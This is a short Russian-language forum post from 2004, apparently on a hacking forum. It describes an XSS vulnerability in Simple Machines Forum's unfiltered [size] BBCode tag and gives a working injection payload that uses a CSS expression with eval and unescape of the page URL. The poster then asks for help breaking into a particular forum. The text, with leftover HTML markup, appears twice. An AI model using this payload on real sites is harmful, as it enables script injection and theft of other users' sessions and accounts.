Nemirof
23.10.2004, 00:47
Уязвимость обнаружена в Simple Machines SMF. Удаленный пользователь может выполнить XSS нападение.
SMF не фильтрует данные, представленные пользователем в тэге '[size]'. Пример:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[size=expression(eval(unescape(document.URL.substr ing(document.URL.
length-41,document.URL.length))))]Big Exploit[/size][/QUOTE]<span id='postcolor'>
если кому не лень помогите мне с этим форумом разобраться,а то я уже весь мозг напряг http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif но так ничего и не придумал
SMF не фильтрует данные, представленные пользователем в тэге '[size]'. Пример:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[size=expression(eval(unescape(document.URL.substr ing(document.URL.
length-41,document.URL.length))))]Big Exploit[/size][/QUOTE]<span id='postcolor'>
если кому не лень помогите мне с этим форумом разобраться,а то я уже весь мозг напряг http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif но так ничего и не придумал